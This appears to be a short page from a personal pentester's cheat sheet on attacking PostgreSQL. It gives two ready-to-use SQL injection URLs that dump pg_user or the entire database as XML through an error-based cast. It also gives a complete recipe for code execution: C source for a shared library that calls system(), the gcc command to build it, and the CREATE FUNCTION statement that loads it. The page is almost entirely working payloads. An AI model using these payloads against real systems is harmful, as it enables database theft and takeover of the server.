xct's notes
Search…
Postgres

Query_To_XML

Example:
We can get the result of a query as xml, making data exfiltration a lot faster.
1
http://127.0.0.1:5000/?order=id&sort=,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20query_to_xml('select%20*%20from%20pg_user',true,true,''))%20AS%20NUMERIC)=%271%27))%20THEN%20name%20ELSE%20note%20END)
Copied!

Database_To_XML

We can even get the complete database as XML in a single query!
1
http://127.0.0.1:5000/?order=id&sort=,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20database_to_xml(true,true,''))%20AS%20NUMERIC)=%271%27))%20THEN%20name%20ELSE%20note%20END)
Copied!

RCE via Config File Overwrite

Load shared library

1
sudo apt-get install postgresql-server-dev-11
Copied!
1
#include "postgres.h"
2
#include "fmgr.h"
3
#include <stdlib.h>
4
5
#ifdef PG_MODULE_MAGIC
6
PG_MODULE_MAGIC;
7
#endif
8
9
10
Datum exec(PG_FUNCTION_ARGS){
11
system("<cmd>");
12
13
};
14
PG_FUNCTION_INFO_V1(exec);
Copied!
1
gcc xct.c -I`pg_config --includedir-server` -fPIC -shared -o xct.so
Copied!
1
CREATE OR REPLACE FUNCTION exec() RETURNS text AS '/tmp/xct.so', 'exec' LANGUAGE C STRICT;
2
SELECT exec();
Copied!
Last modified 1yr ago